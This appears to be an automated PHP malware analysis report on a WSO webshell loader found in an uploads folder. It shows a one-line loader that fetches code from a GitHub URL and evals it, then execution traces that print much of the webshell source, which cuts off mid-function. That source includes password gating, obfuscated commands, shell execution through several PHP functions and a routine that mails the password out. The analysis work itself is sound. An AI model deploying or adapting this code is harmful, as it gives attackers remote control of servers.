PHP Malware Analysis
wsoby.php
md5: aa703dc7973ee8e1e1c808b968a26d8b
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- test@testmail.com (Traces)
Encoding
Environment
Execution
Files
- copy (Traces)
- file_get_contents (Deobfuscated, Traces)
- file_put_contents (Traces)
- move_uploaded_file (Traces)
Input
Title
- " . $_SERVER[\'HTTP_HOST\'] . " - WSO " . VERSION ." (Traces)
URLs
- http://md5.rednoize.com/?q= (Traces)
- http://nullrefer.com/?https://www.exploit-db.com/search/?action=search&description= (Traces)
- https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js (Traces)
- https://cdn.rawgit.com/kimeiga/bahunya/css/bahunya-0.1.3.css (Traces)
- https://fonts.googleapis.com/css?family=Nunito (Traces)
- https://github.com/mIcHyAmRaNe (Traces)
- https://nullrefer.com/?https://www.google.com/search?q= (Traces)
- https://raw.githubusercontent.com/0xNix/wso/main/wso.php (Deobfuscated, Original, Traces)
- https://www.md5decrypter.com/ (Traces)
Deobfuscated PHP code
<?php
echo null;
/********/
/*******/
/********/
@eval("?>" . file_get_contents("https://raw.githubusercontent.com/0xNix/wso/main/wso.php"));
/**/
?> Execution traces
data/traces/aa703dc7973ee8e1e1c808b968a26d8b_trace-1676255575.194.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:33:21.091863]
1 0 1 0.000175 393512
1 3 0 0.000233 393872 {main} 1 /var/www/html/uploads/wsoby.php 0 0
2 4 0 0.000255 393872 file_get_contents 0 /var/www/html/uploads/wsoby.php 1 1 'https://raw.githubusercontent.com/0xNix/wso/main/wso.php'
2 4 1 0.057696 487016
2 4 R '<?php\r\n//--------------Watching webshell!--------------\r\nif(array_key_exists(\'watching\',$_POST)){\r\n\t$tmp = $_SERVER[\'SERVER_NAME\'].$_SERVER[\'PHP_SELF\']."\\n".$_POST[\'pass\']; @mail(\'test@testmail.com\', \'root\', $tmp); // Edit or delete!\r\n}\r\n//-----------------Password---------------------\r\n$▛ = "d2f7bd4883410688e2ece6b5e9b85856";\r\n$▘ = true;\r\n$▜ = \'UTF-8\';\r\n$▚ = \'FilesMan\';\r\n$▙ = md5($_SERVER[\'HTTP_USER_AGENT\']);\r\nif (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'
2 5 0 0.060407 1046456 eval 1 '?><?php\r\n//--------------Watching webshell!--------------\r\nif(array_key_exists(\'watching\',$_POST)){\r\n\t$tmp = $_SERVER[\'SERVER_NAME\'].$_SERVER[\'PHP_SELF\']."\\n".$_POST[\'pass\']; @mail(\'test@testmail.com\', \'root\', $tmp); // Edit or delete!\r\n}\r\n//-----------------Password---------------------\r\n$▛ = "d2f7bd4883410688e2ece6b5e9b85856";\r\n$▘ = true;\r\n$▜ = \'UTF-8\';\r\n$▚ = \'FilesMan\';\r\n$▙ = md5($_SERVER[\'HTTP_USER_AGENT\']);\r\nif (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"])) {\r\n\tprototype(md5($_SERVER[\'HTTP_HOST\'])."key", $▙);\r\n}\r\nif(empty($_POST[\'charset\']))\r\n\t$_POST[\'charset\'] = $▜;\r\nif (!isset($_POST[\'ne\'])) {\r\n\tif(isset($_POST[\'a\'])) $_POST[\'a\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'a\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'c\'])) $_POST[\'c\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'c\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p1\'])) $_POST[\'p1\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p1\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p2\'])) $_POST[\'p2\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p2\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p3\'])) $_POST[\'p3\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p3\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n}\r\nfunction decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\nif(version_compare(PHP_VERSION, \'5.3.0\', \'<\')){\r\n set_magic_quotes_runtime(0);\r\n}\r\n@define(\'VERSION\', \'4.2.6\');\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction stripslashes_array($array) {\r\n\t\treturn is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n\t}\r\n\t$_POST = stripslashes_array($_POST);\r\n $_COOKIE = stripslashes_array($_COOKIE);\r\n}\r\n/* (С) 11.2011 oRb */\r\nif(!empty($▛)) {\r\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $▛))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']), $▛);\r\n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $▛))\r\n hardLogin();\r\n}\r\nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$▘;\r\nfunction hardLogin() {\r\n\t\tif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n\t\t $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\r\n\t\t if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n\t\t header(\'HTTP/1.0 404 Not Found\');\r\n\t\t exit;\r\n\t\t }\r\n\t\t}\r\n\tdie("</br></br><pre align=center><form method=post style=\'font-family:Nunito, sans-serif;color:#1a1a1a; text-shadow: 2px 0 0 #0d52bf, -2px 0 0 #0d52bf, 0 2px 0 #0d52bf, 0 -2px 0 #0d52bf, 1px 1px #0d52bf, -1px -1px 0 #0d52bf, 1px -1px 0 #0d52bf, -1px 1px 0 #0d52bf; text-align: center;\'><h3>Hello <br>Welcome to wso webshell redesignated by mIcHy AmRaNe</h3><br><input placeholder=\'password\' type=password name=pass style=\'border-radius: 4px 0px 0px 4px; background-color:whitesmoke;border:1px solid #FFF;outline:none;\' required><input type=submit name=\'watching\' value=\'>>\' style=\'height: 20px; border: none; border-radius: 0px 4px 4px 0px;background-color:#0d52bf;color:#fff;cursor:pointer;\'></form></pre>\r\n<div class=\'view\'><div class=\'plane main\'><div class=\'circle\'></div><div class=\'circle\'></div><div class=\'circle\'></div><div class=\'circle\'></div><div class=\'circle\'></div><div class=\'circle\'></div></div></div>\r\n<style>body,html{background:#1a1a1a;overflow:hidden;width:100%;height:100%;position:absolute;z-index: -2;}.view{position:absolute;top:0;left:0;right:0;bottom:0;-webkit-perspective:400;perspective:400;z-index: -2;}.plane{width:120px;height:120px;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;position:absolute;z-index: -2;}.plane.main{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;-webkit-transform:rotateX(60deg) rotateZ(-30deg);transform:rotateX(60deg) rotateZ(-30deg);-webkit-animation:rotate 20s infinite linear;animation:rotate 20s infinite linear;z-index: -2;}.plane.main .circle{width:120px;height:120px;position:absolute;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;border-radius:100%;box-sizing:border-box;box-shadow:0 0 60px #a10705,inset 0 0 60px #7a0000;z-index: -2;}.plane.main .circle::after,.plane.main .circle::before{content:\'\';display:block;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:5%;height:5%;border-radius:100%;background:#5d0819;box-sizing:border-box;box-shadow:0 0 60px 2px #7a0000;z-index: -2;}.plane.main .circle::before{-webkit-transform:translateZ(-90px);transform:translateZ(-90px)}.plane.main .circle::after{-webkit-transform:translateZ(90px);transform:translateZ(90px)}.plane.main .circle:nth-child(1){-webkit-transform:rotateZ(72deg) rotateX(63.435deg);transform:rotateZ(72deg) rotateX(63.435deg)}.plane.main .circle:nth-child(2){-webkit-transform:rotateZ(144deg) rotateX(63.435deg);transform:rotateZ(144deg) rotateX(63.435deg)}.plane.main .circle:nth-child(3){-webkit-transform:rotateZ(216deg) rotateX(63.435deg);transform:rotateZ(216deg) rotateX(63.435deg)}.plane.main .circle:nth-child(4){-webkit-transform:rotateZ(288deg) rotateX(63.435deg);transform:rotateZ(288deg) rotateX(63.435deg)}.plane.main .circle:nth-child(5){-webkit-transform:rotateZ(360deg) rotateX(63.435deg);transform:rotateZ(360deg) rotateX(63.435deg)}@-webkit-keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}@keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}; h2{color:whitesmoke; font-weight:bold; text-decoration:underline;}</style>");\r\n}\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n\t$os = \'win\';\r\nelse\r\n\t$os = \'nix\';\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n\t@chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n\t$cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif($cwd[strlen($cwd)-1] != \'/\')\r\n\t$cwd .= \'/\';\r\n/* (С) 04.2015 Pirat */\r\nfunction hardHeader() {\r\n\tif(empty($_POST[\'charset\']))\r\n\t\t$_POST[\'charset\'] = $GLOBALS[\'▜\'];\r\n\techo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . VERSION ."</title>\r\n <link href=\'https://fonts.googleapis.com/css?family=Nunito\' rel=\'stylesheet\'>\r\n <link rel=\'stylesheet\' href=\'https://cdn.rawgit.com/kimeiga/bahunya/css/bahunya-0.1.3.css\'>\r\n<style>\r\n\tbody {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}\r\n\t#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(\'\'); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}\r\n\tbody,td,th\t{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}\r\n\ttable.info\t{color:#C3C3C3;}\r\n\ttable#toolsTbl {background-color: #060A10;}\r\n\tspan,h1,a\t{color:#68b723 !important;}\r\n\tspan\t\t{font-weight:bolder;}\r\n\th1\t\t\t{border-left:5px solid #a10705;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}\r\n\tdiv.content\t{padding:5px;margin-left:5px;background-color:#060a10;}\r\n\ta\t\t\t{text-decoration:none;}\r\n\ta:hover\t\t{text-decoration:underline;}\r\n\t.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}\r\n\t.tooltip:hover::after {opacity:1;visibility:visible;}\r\n\t.ml1\t\t{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}\r\n\t.bigarea\t{min-width:100%;max-width:100%;height:400px;}\r\n\tinput, textarea, select\t{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}\r\n\tlabel {position:relative}\r\n\tlabel:after{border-bottom:2px solid #999;border-right:2px solid #999;content:\'\';display:block;height:5px;margin-top:-4px;pointer-events:none;position:absolute;right:12px;top:50%;-webkit-transform-origin:66% 66%;-ms-transform-origin:66% 66%;transform-origin:66% 66%;-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);-webkit-transition:all .15s ease-in-out;transition:all .15s ease-in-out;width:5px}\r\n\tlabel:before {content:\'\';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}\r\n\tform\t\t{margin:0px;}\r\n\t#toolsTbl\t{text-align:center;}\r\n\t#fak \t\t{background:none;}\r\n\t#fak td \t{padding:5px 0 0 0;}\r\n\tiframe\t\t{border:1px solid #060a10;}\r\n\t.toolsInp\t{width:300px}\r\n\t.main th\t{text-align:left;background-color:#060a10;}\r\n\t.main tr:hover{background-color:#354252;}\r\n\t.main td, th{vertical-align:middle;}\r\n\tinput[type=\'submit\']{background-color:#0d52bf; color:#fafafa;}\r\n\tinput[type=\'button\']{background-color:#0d52bf; color:#fafafa;}\r\n\tinput[type=\'submit\']:hover{background-color:#002e99; color:#fafafa;}\r\n\tinput[type=\'button\']:hover{background-color:#002e99; color:#fafafa;}\r\n\t.l1\t\t\t{background-color:#202832;}\r\n\tpre\t\t\t{font:9pt Courier New;}\r\n</style>\r\n<script>\r\n var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\r\n var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'\r\n var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\r\n var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';\r\n var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';\r\n var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';\r\n var d = document;\r\n\tfunction encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr=\'\';var enc_str=\'\';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}\r\n\tfunction utf8_encode(argString){var string=(argString+\'\');var utftext=\'\',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\r\n\tfunction base64_encode(data){var b64 = \'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc=\'\',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+\'\');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join(\'\');switch (data.length%3){case 1:enc=enc.slice(0,-2)+\'==\';break;case 2:enc=enc.slice(0,-1)+\'=\';break;}return enc;}\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\td.mf.a.value = encrypt(d.mf.a.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.c.value = encrypt(d.mf.c.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p1.value = encrypt(d.mf.p1.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p2.value = encrypt(d.mf.p2.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p3.value = encrypt(d.mf.p3.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = \'ajax=true\';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject(\'Microsoft.XMLHTTP\');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open(\'POST\', url, true);\r\n req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\", \'m\');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert(\'Request error!\');\r\n\t}\r\n</script>\r\n<head><body><div style=\'position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;\'>\r\n<form method=post name=mf style=\'display:none;\'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>";\r\n\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n\t$totalSpace = $totalSpace?$totalSpace:1;\r\n\t$release = @php_uname(\'r\');\r\n\t$kernel = @php_uname(\'s\');\r\n\t$explink = \'http://nullrefer.com/?https://www.exploit-db.com/search/?action=search&description=\';\r\n\tif(strpos(\'Linux\', $kernel) !== false)\r\n\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n\telse\r\n\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n\tif(!function_exists(\'posix_getegid\')) {\r\n\t\t$user = @get_current_user();\r\n\t\t$uid = @getmyuid();\r\n\t\t$gid = @getmygid();\r\n\t\t$group = "?";\r\n\t} else {\r\n\t\t$uid = @posix_getpwuid(@posix_geteuid());\r\n\t\t$gid = @posix_getgrgid(@posix_getegid());\r\n\t\t$user = $uid[\'name\'];\r\n\t\t$uid = $uid[\'uid\'];\r\n\t\t$group = $gid[\'name\'];\r\n\t\t$gid = $gid[\'gid\'];\r\n\t}\r\n\t$cwd_links = \'\';\r\n\t$path = explode("/", $GLOBALS[\'cwd\']);\r\n\t$n=count($path);\r\n\tfor($i=0; $i<$n-1; $i++) {\r\n\t\t$cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n\t\tfor($j=0; $j<=$i; $j++)\r\n\t\t\t$cwd_links .= $path[$j].\'/\';\r\n\t\t$cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n\t}\r\n\t$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n\t$opt_charsets = \'\';\r\n\tforeach($charsets as $▟)\r\n\t\t$opt_charsets .= \'<option value="\'.$▟.\'" \'.($_POST[\'charset\']==$▟?\'selected\':\'\').\'>\'.$▟.\'</option>\';\r\n\t$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Infect\'=>\'Infect\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\r\n\tif(!empty($GLOBALS[\'▛\']))\r\n\t$m[\'Logout\'] = \'Logout\';\r\n\t$m[\'Self remove\'] = \'SelfRemove\';\r\n\t$menu = \'\';\r\n\tforeach($m as $k => $v)\r\n\t\t$menu .= \'<th>[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\';\r\n\t$drives = "";\r\n\tif ($GLOBALS[\'os\'] == \'win\') {\r\n\t\tforeach(range(\'c\',\'z\') as $drive)\r\n\t\tif (is_dir($drive.\':\\\\\'))\r\n\t\t\t$drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n\t}\r\n\t/* (С) 08.2015 dmkcv */\r\n\techo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\'.($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\').\'</span></td>\'.\r\n\t\t \'<td><nobr>\'.substr(@php_uname(), 0, 120).\' <a href="https://nullrefer.com/?https://www.google.com/search?q=\'.urlencode(@php_uname()).\'" target="_blank">[ Google ]</a> <a href="\'.$explink.\'" target=_blank>[ Exploit-DB ]</a></nobr><br>\'.$uid.\' ( \'.$user.\' ) <span>Group:</span> \'.$gid.\' ( \' .$group. \' )<br>\'.@phpversion().\' <span>Safe mode:</span> \'.($GLOBALS[\'safe_mode\']?\'<font color=#a10705>ON</font>\':\'<font color=#f9c440><b>OFF</b></font>\').\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \'.date(\'Y-m-d H:i:s\').\'<br>\'.viewSize($totalSpace).\' <span>Free:</span> \'.viewSize($freeSpace).\' (\'.round(100/($totalSpace/$freeSpace),2).\'%)<br>\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>\'.$drives.\'</td>\'.\r\n\t\t \'<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">\'.$opt_charsets.\'</select></label><br><span>Server IP:</span><br>\'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br><span>Client IP:</span><br>\'.$_SERVER[\'REMOTE_ADDR\'].\'</nobr></td></tr></table>\'.\r\n\t\t \'<table style="background-color:#0d52bf;" cellpadding=3 cellspacing=0 width=100%><tr>\'.$menu.\'</tr></table><div>\';\r\n}\r\nfunction hardFooter() {\r\n\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'#f9c440\'>[ Writeable ]</font>":" <font color=#a10705>(Not writable)</font>";\r\n echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>\r\n\t<tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesMan\')? "g(null,this.c.value,\'\');":\'\' )."return false;\\"><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form onsubmit=\\"".(function_exists(\'actionFilesTools\')? "g(\'FilesTools\',null,this.f.value);":\'\' )."return false;\\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f required><input type=submit value=\'submit\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesMan\')? "g(\'FilesMan\',null,\'mkdir\',this.d.value);":\'\' )."return false;\\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d required><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesTools\')? "g(\'FilesTools\',null,this.f.value,\'mkfile\');":\'\' )."return false;\\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f required><input type=submit value=\'submit\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionConsole\')? "g(\'Console\',null,this.c.value);":\'\' )."return false;\\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form method=\'post\' ".( (!function_exists(\'actionFilesMan\'))? " onsubmit=\\"return false;\\" ":\'\' )."ENCTYPE=\'multipart/form-data\'>\r\n\t\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t\t<input type=hidden name=p1 value=\'uploadFile\'>\r\n\t\t<input type=hidden name=ne value=\'\'>\r\n\t\t<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\r\n\t\t<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f[] multiple><input type=submit value=\'submit\'></form><br ></td>\r\n\t</tr></table></div>\r\n\t<!-- particles --> <div id=\'particles-js\'></div><script src=\'https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js\'></script>\r\n\t<script>particlesJS(\'particles-js\', {\'particles\':{\'number\':{\'value\':80,\'density\':{\'enable\':true,\'value_area\':800}},\'color\':{\'value\':\'#ffffff\'},\'shape\':{\'type\':\'triangle\',\'stroke\':{\'width\':0,\'color\':\'#000000\'},\'polygon\':{\'nb_sides\':5},\'image\':{\'src\':\'img/github.svg\',\'width\':100,\'height\':100}},\'opacity\':{\'value\':0.5,\'random\':true,\'anim\':{\'enable\':false,\'speed\':1,\'opacity_min\':0.1,\'sync\':false}},\'size\':{\'value\':3,\'random\':true,\'anim\':{\'enable\':false,\'speed\':40,\'size_min\':0.1,\'sync\':false}},\'line_linked\':{\'enable\':true,\'distance\':200,\'color\':\'#ffffff\',\'opacity\':0.4,\'width\':1},\'move\':{\'enable\':true,\'speed\':1,\'direction\':\'none\',\'random\':true,\'straight\':false,\'out_mode\':\'out\',\'bounce\':false,\'attract\':{\'enable\':false,\'rotateX\':10000,\'rotateY\':10000}}},\'interactivity\':{\'detect_on\':\'canvas\',\'events\':{\'onhover\':{\'enable\':true,\'mode\':\'grab\'},\'onclick\':{\'enable\':true,\'mode\':\'repulse\'},\'resize\':true},\'modes\':{\'grab\':{\'distance\':200,\'line_linked\':{\'opacity\':0.5}},\'bubble\':{\'particles_nb\':2}}},\'retina_detect\':true});</script>\r\n\t</body></html>";\r\n}\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} }\r\nfunction ex($in) {\r\n\t$▖ = \'\';\r\n\tif (function_exists(\'exec\')) {\r\n\t\t@exec($in,$▖);\r\n\t\t$▖ = @join("\\n",$▖);\r\n\t} elseif (function_exists(\'passthru\')) {\r\n\t\tob_start();\r\n\t\t@passthru($in);\r\n\t\t$▖ = ob_get_clean();\r\n\t} elseif (function_exists(\'system\')) {\r\n\t\tob_start();\r\n\t\t@system($in);\r\n\t\t$▖ = ob_get_clean();\r\n\t} elseif (function_exists(\'shell_exec\')) {\r\n\t\t$▖ = shell_exec($in);\r\n\t} elseif (is_resource($f = @popen($in,"r"))) {\r\n\t\t$▖ = "";\r\n\t\twhile(!@feof($f))\r\n\t\t\t$▖ .= fread($f,1024);\r\n\t\tpclose($f);\r\n\t}else return "↳ Unable to execute command\\n";\r\n\treturn ($▖==\'\'?"↳ Query did not return 